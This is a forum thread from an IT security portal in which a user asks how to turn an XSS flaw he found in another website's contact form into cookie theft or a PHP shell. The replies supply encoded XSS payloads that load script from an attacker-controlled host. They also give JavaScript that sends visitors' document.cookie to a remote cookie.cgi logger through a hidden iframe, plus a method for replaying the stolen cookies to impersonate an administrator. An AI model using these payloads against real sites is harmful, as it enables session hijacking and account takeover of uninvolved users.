 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 54
 Members: 0
 Total: 54
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
XSS on Forum - remote PHP shell or cookie.cgi questions |
|
 Posted: Thu Dec 20, 2007 1:27 am |
 |
|
| onetwothree |
| Beginner |
 |
|
| Joined: Oct 20, 2007 |
| Posts: 3 |
|
|
|
 |
|
 |
|
I found a website that is vulnerable to and XSS attack via a contact forum. I am able to post the following popup;
[img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]
Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above
My questions are these:
1.What type of encoding is the script above?
2.Can I modify the above to call a php shell (c99), or to steal vistors cookies with my cookie.cgi script
thanks in advance for help pointing me in the right direction |
|
|
|
|
|
|
|
|
| Posted: Thu Dec 20, 2007 3:18 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
First of all, forget c99 shell in this stage of actions. You are going to steal the cookie, so ultimate goal right now is to have user plaintext password, password hash or session ID. And if you can use this information to impersonate the victim (usually admin), them maybe you can somehow reach to php shell level.
This specific target seems to have some input filtering in place, so it probably needs some testing and probing.
My suggestion is something like
| Code: |
[img]>"><ScRiPt%20%0a%0dsrc%3Dhttp%3A%2F%2Fmyhosting.com%2Fjs.js></ScRiPt>.[/img]
|
And then put javascript file to your hosting server and that js will do the cookie stealing by image url for example. |
|
|
|
|
|
Re: XSS on Forum - remote PHP shell or cookie.cgi questions |
|
| Posted: Wed Mar 12, 2008 2:22 am |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
| onetwothree wrote: | I found a website that is vulnerable to and XSS attack via a contact forum. I am able to post the following popup;
[img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]
Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above
My questions are these:
1.What type of encoding is the script above?
2.Can I modify the above to call a php shell (c99), or to steal vistors cookies with my cookie.cgi script
thanks in advance for help pointing me in the right direction |
Since this is only XSS, you can only put client-side scripting in there. You will need to steal a cookie[mm yummy].
I suggest doing:
| Code: | | [img]>"><script src=http://yoursite.com/hola.js>[/img] |
And in hola.js on yoursite.com, put the following code:
| Code: |
document.write('<iframe src="http://yoursite.com/cookie.cgi?cookie=' + document.cookie + '" border="0" height="0px" width="0px"></iframe>');
|
Not the best way to do it, but gets the job done.
Then once you have the cookie[if you have firefox get AnEC, and just edit the values or add them, and ignore this]:
go to your browser and put:
| Code: | | javascript:void(document.cookie='cookie=here'); |
or something like that, I suggest 1 cookie at a time. |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
